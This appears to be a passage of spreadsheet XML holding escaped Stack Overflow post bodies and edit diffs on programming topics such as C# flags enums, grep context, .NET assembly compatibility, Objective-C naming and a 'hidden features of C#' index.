    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can also do this&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[Flags]_x000D_
public enum MyEnum_x000D_
{_x000D_
    None   = 0,_x000D_
    First  = 1 &amp;lt;&amp;lt; 0,_x000D_
    Second = 1 &amp;lt;&amp;lt; 1,_x000D_
    Third  = 1 &amp;lt;&amp;lt; 2,_x000D_
    Fourth = 1 &amp;lt;&amp;lt; 3_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I find the bit-shifting easier than typing 4,8,16,32 and so on. It has no impact on your code because it's all done at compile time&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Orion Edwards</t>
  </si>
  <si>
    <t>realstrategos</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to watch for changes in the &lt;a href="/questions/tagged/ip-address" class="post-tag" title="show questions tagged 'ip-address'" rel="tag"&gt;&lt;span class="diff-delete"&gt;ip-address&lt;/span&gt;&lt;/a&gt; much the same as it is possible to watch for changes to files using the &lt;code&gt;&lt;span class="diff-delete"&gt;FileSystemWatcher&lt;/span&gt;&lt;/code&gt;? I'm connecting to a machine via &lt;a href="/questions/tagged/tcp-ip" class="post-tag" title="show questions tagged 'tcp-ip'" rel="tag"&gt;&lt;span class="diff-delete"&gt;tcp-ip&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;. But,&lt;/span&gt; it takes a while until it gives me an &lt;a href="/questions/tagged/ip-address" class="post-tag" title="show questions tagged 'ip-address'" rel="tag"&gt;&lt;span class="diff-delete"&gt;ip-address&lt;/span&gt;&lt;/a&gt;. I would like to dim out the connect &lt;code&gt;&lt;span class="diff-delete"&gt;Button&lt;/span&gt;&lt;/code&gt; until I have a valid &lt;a href="/questions/tagged/ip-address" class="post-tag" title="show questions tagged 'ip-address'" rel="tag"&gt;&lt;span class="diff-delete"&gt;ip-address&lt;/span&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a way to watch for changes in the &lt;span class="diff-add"&gt;ip-address&lt;/span&gt; much the same as it is possible to watch for changes to files using the &lt;span class="diff-add"&gt;FileSystemWatcher&lt;/span&gt;? I'm connecting to a machine via &lt;span class="diff-add"&gt;tcp/ip but&lt;/span&gt; it takes a while until it gives me an &lt;span class="diff-add"&gt;ip-address&lt;/span&gt;. I would like to dim out the connect &lt;span class="diff-add"&gt;button&lt;/span&gt; until I have a valid &lt;span class="diff-add"&gt;ip-address&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Abhishek</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This came to my mind after I learned the following from &lt;a href="http://www.stackoverflow.com/questions/8941/generic-type-checking"&gt;this question&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;struct&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; We, C# developers, all know the basics of C#. I mean declarations, conditionals, loops, operators, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; Some of us even mastered the stuff like &lt;a href="http://msdn.microsoft.com/en-us/library/512aeb7t.aspx" rel="nofollow noreferrer"&gt;Generics&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/bb397696.aspx" rel="nofollow noreferrer"&gt;anonymous types&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/bb397687.aspx" rel="nofollow noreferrer"&gt;lambdas&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/bb397676.aspx" rel="nofollow noreferrer"&gt;linq&lt;/a&gt;, ...&lt;/p&gt; _x000D_
 &lt;p&gt; But what are the most hidden features or tricks of C# that even C# fans, addicts, experts barely know?&lt;/p&gt; _x000D_
 &lt;h1&gt;Here are the revealed features so far:&lt;/h1&gt; _x000D_
 &lt;br&gt; Keywords - _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/9k7k7cf0.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;yield&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9035#9035"&gt;Michael Stum&lt;/a&gt;&lt;br&gt; &lt;code&gt;var&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9035#9035"&gt;Michael Stum&lt;/a&gt;&lt;br&gt; &lt;code&gt;using()&lt;/code&gt; statement by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9036#9036"&gt;kokos&lt;/a&gt;&lt;br&gt; &lt;code&gt;readonly&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9036#9036"&gt;kokos&lt;/a&gt;&lt;br&gt; &lt;code&gt;as&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9041#9041"&gt;Mike Stone&lt;/a&gt;&lt;br&gt; &lt;code&gt;as&lt;/code&gt; / &lt;code&gt;is&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9070#9070"&gt;Ed Swangren&lt;/a&gt;&lt;br&gt; &lt;code&gt;as&lt;/code&gt; / &lt;code&gt;is&lt;/code&gt; (improved) by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9092#9092"&gt;Rocketpants&lt;/a&gt;&lt;br&gt; &lt;code&gt;default&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9639#9639"&gt;deathofrats&lt;/a&gt;&lt;br&gt; &lt;code&gt;global::&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/12152#12152"&gt;pzycoman&lt;/a&gt;&lt;br&gt; &lt;code&gt;using()&lt;/code&gt; blocks by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/12316#12316"&gt;AlexCuse&lt;/a&gt;&lt;br&gt; &lt;code&gt;volatile&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/59691#59691"&gt;Jakub Šturc&lt;/a&gt;&lt;br&gt; &lt;code&gt;extern alias&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/37926#37926"&gt;Jakub Šturc&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Attributes&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.componentmodel.defaultvalueattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;DefaultValueAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9035#9035"&gt;Michael Stum&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/system.obsoleteattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;ObsoleteAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9037#9037"&gt;DannySmurf&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/system.diagnostics.debuggerdisplayattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;DebuggerDisplayAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9048#9048"&gt;Stu&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/system.diagnostics.debuggerbrowsableattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;DebuggerBrowsable&lt;/code&gt;&lt;/a&gt; and &lt;a href="http://msdn.microsoft.com/en-us/library/system.diagnostics.debuggerstepthroughattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;DebuggerStepThrough&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/33474#33474"&gt;bdukes&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/system.threadstaticattribute(VS.71).aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;ThreadStaticAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/13932#13932"&gt;marxidad&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/system.flagsattribute.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;FlagsAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/21752#21752"&gt;Martin Clarke&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/library/4xssyw96.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;ConditionalAttribute&lt;/code&gt;&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/35342#35342"&gt;AndrewBurns&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Syntax&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ms173224.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;??&lt;/code&gt;&lt;/a&gt; operator by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9036#9036"&gt;kokos&lt;/a&gt;&lt;br&gt; number flaggings by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9038#9038"&gt;Nick Berardi&lt;/a&gt;&lt;br&gt; &lt;code&gt;where T:new&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9067#9067"&gt;Lars Mæhlum&lt;/a&gt;&lt;br&gt; implicit generics by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9099#9099"&gt;Keith&lt;/a&gt;&lt;br&gt; one-parameter lambdas by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9099#9099"&gt;Keith&lt;/a&gt;&lt;br&gt; auto properties by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9099#9099"&gt;Keith&lt;/a&gt;&lt;br&gt; namespace aliases by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9099#9099"&gt;Keith&lt;/a&gt;&lt;br&gt; verbatim string literals with @ by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9114#9114"&gt;Patrick&lt;/a&gt;&lt;br&gt; &lt;code&gt;enum&lt;/code&gt; values by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/11738#11738"&gt;lfoust&lt;/a&gt;&lt;br&gt; @variablenames by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/14088#14088"&gt;marxidad&lt;/a&gt;&lt;br&gt; &lt;code&gt;event&lt;/code&gt; operators by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/14277#14277"&gt;marxidad&lt;/a&gt;&lt;br&gt; format string brackets by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/15321#15321"&gt;Portman&lt;/a&gt;&lt;br&gt; property accessor accessibility modifiers by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/15715#15715"&gt;xanadont&lt;/a&gt;&lt;br&gt; ternary operator (&lt;code&gt;?:&lt;/code&gt;) by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/16450#16450"&gt;JasonS&lt;/a&gt;&lt;br&gt; &lt;code&gt;checked&lt;/code&gt; and &lt;code&gt;unchecked&lt;/code&gt; operators by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/355991#355991"&gt;Binoj Antony&lt;/a&gt;&lt;br&gt; &lt;code&gt;implicit and explicit&lt;/code&gt; operators by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/121470#121470"&gt;Flory&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Language Features&lt;/h2&gt; _x000D_
 &lt;p&gt; Nullable types by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9055#9055"&gt;Brad Barker&lt;/a&gt;&lt;br&gt; Currying by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9066#9066"&gt;Brian Leahy&lt;/a&gt;&lt;br&gt; anonymous types by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9099#9099"&gt;Keith&lt;/a&gt;&lt;br&gt; &lt;code&gt;__makeref __reftype __refvalue&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9125#9125"&gt;Judah Himango&lt;/a&gt;&lt;br&gt; object initializers by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9547#9547"&gt;lomaxx&lt;/a&gt;&lt;br&gt; format strings by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/10207#10207"&gt;David in Dakota&lt;/a&gt;&lt;br&gt; Extension Methods by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/13932#13932"&gt;marxidad&lt;/a&gt;&lt;br&gt; &lt;code&gt;partial&lt;/code&gt; methods by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/16395#16395"&gt;Jon Erickson&lt;/a&gt;&lt;br&gt; preprocessor directives by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/16482#16482"&gt;John Asbeck&lt;/a&gt;&lt;br&gt; &lt;code&gt;DEBUG&lt;/code&gt; pre-processor directive by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/29081#29081"&gt;Robert Durgin&lt;/a&gt;&lt;br&gt; operator overloading by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/24914#24914"&gt;SefBkn&lt;/a&gt;&lt;br&gt; type inferrence by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/28811#28811"&gt;chakrit&lt;/a&gt;&lt;br&gt; boolean operators &lt;a href="http://www.java2s.com/Tutorial/CSharp/0160__Operator-Overload/truefalseoperatorforComplex.htm" rel="nofollow noreferrer"&gt;taken to next level&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/32148#32148"&gt;Rob Gough&lt;/a&gt;&lt;br&gt; pass value-type variable as interface without boxing by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/1820538#1820538"&gt;Roman Boiko&lt;/a&gt;&lt;br&gt; programmatically determine declared variable type by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/1789985#1789985"&gt;Roman Boiko&lt;/a&gt;&lt;br&gt; Static Constructors by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/100321#100321"&gt;Chris&lt;/a&gt;&lt;br&gt; Easier-on-the-eyes / condensed ORM-mapping using LINQ by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/2026781#2026781"&gt;roosteronacid&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Visual Studio Features&lt;/h2&gt; _x000D_
 &lt;p&gt; select block of text in editor by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/1699477#1699477" title="block text selecting with alt key"&gt;Himadri&lt;/a&gt;&lt;br&gt; snippets by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9037#9037"&gt;DannySmurf&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Framework&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;code&gt;TransactionScope&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9042#9042"&gt;KiwiBastard&lt;/a&gt;&lt;br&gt; &lt;code&gt;DependantTransaction&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9042#9042"&gt;KiwiBastard&lt;/a&gt;&lt;br&gt; &lt;code&gt;Nullable&amp;lt;T&amp;gt;&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9118#9118"&gt;IainMH&lt;/a&gt;&lt;br&gt; &lt;code&gt;Mutex&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9181#9181"&gt;Diago&lt;/a&gt;&lt;br&gt; &lt;code&gt;System.IO.Path&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9401#9401"&gt;ageektrapped&lt;/a&gt;&lt;br&gt; &lt;code&gt;WeakReference&lt;/code&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/14723#14723"&gt;Juan Manuel&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Methods and Properties&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;code&gt;String.IsNullOrEmpty()&lt;/code&gt; method by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9042#9042"&gt;KiwiBastard&lt;/a&gt;&lt;br&gt; &lt;code&gt;List.ForEach()&lt;/code&gt; method by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9042#9042"&gt;KiwiBastard&lt;/a&gt;&lt;br&gt; &lt;code&gt;BeginInvoke()&lt;/code&gt;, &lt;code&gt;EndInvoke()&lt;/code&gt; methods by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9581#9581"&gt;Will Dean&lt;/a&gt;&lt;br&gt; &lt;code&gt;Nullable&amp;lt;T&amp;gt;.HasValue&lt;/code&gt; and &lt;code&gt;Nullable&amp;lt;T&amp;gt;.Value&lt;/code&gt; properties by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/15393#15393"&gt;Rismo&lt;/a&gt;&lt;br&gt; &lt;code&gt;GetValueOrDefault&lt;/code&gt; method by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/18158#18158"&gt;John Sheehan&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Tips &amp;amp; Tricks&lt;/h2&gt; _x000D_
 &lt;p&gt; nice method for event handlers by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9282#9282"&gt;Andreas H.R. Nilsson&lt;/a&gt;&lt;br&gt; uppercase comparisons by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/12137#12137"&gt;John&lt;/a&gt;&lt;br&gt; access anonymous types without reflection by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/13441#13441"&gt;dp&lt;/a&gt;&lt;br&gt; a quick way to lazily instantiate collection properties by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/58945#58945"&gt;Will&lt;/a&gt;&lt;br&gt; JavaScript-like anonymous inline-functions by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/1399130#1399130"&gt;roosteronacid&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;h2&gt;Other&lt;/h2&gt; _x000D_
 &lt;p&gt; netmodules by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/9036#9036"&gt;kokos&lt;/a&gt;&lt;br&gt; &lt;a href="http://www.albahari.com/nutshell/linqbridge.html" rel="nofollow noreferrer"&gt;LINQBridge&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/10886#10886"&gt;Duncan Smart&lt;/a&gt;&lt;br&gt; &lt;a href="http://msdn.microsoft.com/en-us/concurrency/default.aspx" rel="nofollow noreferrer"&gt;Parallel Extensions&lt;/a&gt; by &lt;a href="http://stackoverflow.com/questions/9033/hidden-features-of-c/31293#31293"&gt;Joel Coehoorn&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nevin Mathai</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to &lt;a href="http://en.wiktionary.org/wiki/grep#Verb" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;grep&lt;/span&gt;&lt;/a&gt; for a string, but show the preceding &lt;span class="diff-delete"&gt;five&lt;/span&gt; lines and following &lt;span class="diff-delete"&gt;five&lt;/span&gt; lines as well as the matched line. &lt;span class="diff-delete"&gt;I'm&lt;/span&gt; scanning for errors in a &lt;span class="diff-delete"&gt;log file&lt;/span&gt; and want to see the context.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;How can I do it&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to &lt;span class="diff-add"&gt;grep&lt;/span&gt; for a string, but show the preceding &lt;span class="diff-add"&gt;5&lt;/span&gt; lines and following &lt;span class="diff-add"&gt;5&lt;/span&gt; lines as well as the matched line. &lt;span class="diff-add"&gt; I'm&lt;/span&gt; scanning for errors in a &lt;span class="diff-add"&gt;logfile,&lt;/span&gt; and want to see the context.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Any clues for the clueless&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This should be fine seeing as the CLR hasn't actually changed?&lt;/p&gt; _x000D_
 &lt;p&gt; The boxes running the &lt;code&gt;&lt;span class="diff-delete"&gt;C# 2.0&lt;/span&gt;&lt;/code&gt; code &lt;strong&gt;have&lt;/strong&gt; had &lt;code&gt;&lt;span class="diff-delete"&gt;.NET 3.5&lt;/span&gt;&lt;/code&gt; rolled out.&lt;/p&gt; _x000D_
 &lt;p&gt; The background is that we have a windows service (&lt;code&gt;&lt;span class="diff-delete"&gt;.NET 2.0&lt;/span&gt;&lt;/code&gt; exe built with VS2005, deployed to ~150 servers) that dynamically loads assemblies (almost like plug-ins) to complete various work items asked of it. Whenever we roll out a new version of the bus logic, we just drop the assemblies on an FTP server and the windows service knows how to check for, grab and store the latest versions. New assemblies are now built using VS2008 and targetting &lt;code&gt;&lt;span class="diff-delete"&gt;.NET 2.0&lt;/span&gt;&lt;/code&gt;, we know that works ok. However we'd like to start taking advantage of &lt;code&gt;&lt;span class="diff-delete"&gt;C# 3.0&lt;/span&gt;&lt;/code&gt; language features such as LINQ and targetting the assemblies against .NET 3.5 without having to build and deploy a new version of the windows service.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; @&lt;a href="http://stackoverflow.com/questions/9508/c-20-code-consuming-assemblies-compiled-with-c-30#9537"&gt;lomaxx&lt;/a&gt; - those Albahari lads are fiendishly clever aren't they?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This should be fine seeing as the CLR hasn't actually changed?&lt;/p&gt; _x000D_
 &lt;p&gt; The boxes running the &lt;span class="diff-add"&gt;C# 2.0&lt;/span&gt; code &lt;strong&gt;have&lt;/strong&gt; had &lt;span class="diff-add"&gt;.NET 3.5&lt;/span&gt; rolled out.&lt;/p&gt; _x000D_
 &lt;p&gt; The background is that we have a windows service (&lt;span class="diff-add"&gt;.NET 2.0&lt;/span&gt; exe built with VS2005, deployed to ~150 servers) that dynamically loads assemblies (almost like plug-ins) to complete various work items asked of it. Whenever we roll out a new version of the bus logic, we just drop the assemblies on an FTP server and the windows service knows how to check for, grab and store the latest versions. New assemblies are now built using VS2008 and targetting &lt;span class="diff-add"&gt;.NET 2.0&lt;/span&gt;, we know that works ok. However we'd like to start taking advantage of &lt;span class="diff-add"&gt;C# 3.0&lt;/span&gt; language features such as LINQ and targetting the assemblies against .NET 3.5 without having to build and deploy a new version of the windows service.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; @&lt;a href="http://stackoverflow.com/questions/9508/c-20-code-consuming-assemblies-compiled-with-c-30#9537"&gt;lomaxx&lt;/a&gt; - those Albahari lads are fiendishly clever aren't they?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Michael Schmidt</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a tool which can generate makefile for a C/C++ project for different compilers (&lt;code&gt;&lt;span class="diff-delete"&gt;gcc, Microsoft VC++, Borland etc.&lt;/span&gt;&lt;/code&gt;) and different platforms (&lt;code&gt;&lt;span class="diff-delete"&gt;Win, Linux, Mac&lt;/span&gt;&lt;/code&gt;).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for a tool which can generate makefile for a C/C++ project for different compilers (&lt;span class="diff-add"&gt;gcc, microsoft vc++, borland etc&lt;/span&gt;) and different platforms (&lt;span class="diff-add"&gt;Win, Linux, Mac&lt;/span&gt;).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Being new to Objective-C (but a long term C/++) programmer I'm looking for advice/recommendations on naming conventions for variables.&lt;/p&gt; _x000D_
 &lt;p&gt; My personal preference would be to utilize a prefix for instance variables both for clarity within functions and to prevent shadowing of function parameters. However I'm a fan of properties which rules out prefixes (unless you also prefix your property names, which doesn't work too well and looks daft). Similarly I could use the "self.variable" convention, but only if I make EVERYTHING a property.&lt;/p&gt; _x000D_
 &lt;p&gt; So given the code below what's your preferred naming style for instance/function variables? And if you don't bother, how do you deal with shadowing on function params?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;@interface GridItem : NSObject_x000D_
{_x000D_
    CGRect _rect;_x000D_
    ...  _x000D_
}_x000D_
@end_x000D_
_x000D_
-(void) initFromRect:(CGRect)rect_x000D_
{_x000D_
    _rect = rect;_x000D_
    ..._x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Being new to Objective-C (but a long term C/++) programmer I'm looking for advice/recommendations on naming conventions for variables.&lt;/p&gt; _x000D_
 &lt;p&gt; My personal preference would be to utilize a prefix for instance variables both for clarity within functions and to prevent shadowing of function parameters. However I'm a fan of properties which rules out prefixes (unless you also prefix your property names, which doesn't work too well and looks daft). Similarly I could use the "self.variable" convention, but only if I make EVERYTHING a property.&lt;/p&gt; _x000D_
 &lt;p&gt; So given the code below what's your preferred naming style for instance/function variables? And if you don't bother, how do you deal with shadowing on function params?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;@interface GridItem : NSObject_x000D_
{_x000D_
    CGRect _rect;_x000D_
    ...  _x000D_
}_x000D_
@end_x000D_
_x000D_
-(void) initFromRect:(CGRect)rect_x000D_
{_x000D_
    _rect = rect;_x000D_
    ..._x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Cheers!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anybody know if it's possible, and how, to programmatically send a SMS from the iPhone, with the official &lt;code&gt;&lt;span class="diff-delete"&gt;SDK&lt;/span&gt;&lt;/code&gt; / &lt;code&gt;&lt;span class="diff-delete"&gt;Cocoa Touch&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anybody know if it's possible, and how, to programmatically send a SMS from the iPhone, with the official &lt;span class="diff-add"&gt;SDK&lt;/span&gt; / &lt;span class="diff-add"&gt;Cocoa Touch&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Hemang</t>
  </si>
  <si>
    <t>Paras Joshi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Once I've called &lt;code&gt;DragManager.acceptDrag&lt;/code&gt; is there any way to "unaccept" the drag? Say that I have a view which can accept drag and drop, but only in certain areas. Once the user drags over one of these areas I call &lt;code&gt;DragManager.acceptDrag(this)&lt;/code&gt; (from a &lt;code&gt;DragEvent.DRAG_OVER&lt;/code&gt; handler), but if the user then moves out of this area I'd like to change the status of the drag to not accepted and show the &lt;code&gt;DragManager.NONE&lt;/code&gt; feedback. However, neither calling &lt;code&gt;DragManager.acceptDrag(null)&lt;/code&gt; nor &lt;code&gt;DragManager.showFeedback(DragManager.NONE)&lt;/code&gt; seems to have any effect. Once I've accepted the drag an set the feedback type I can't seem to change it.&lt;/p&gt; _x000D_
 &lt;p&gt; Just to make it clear: the areas where the user should be able to drop are not components or even display objects, in fact they are just ranges in the text of a text field (like the selection). Had they been components of their own I could have solved it by making each of them accept drag events individually. I guess I could create proxy components that float over the text to emulate it, but I'd rather not if it isn't necessary.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
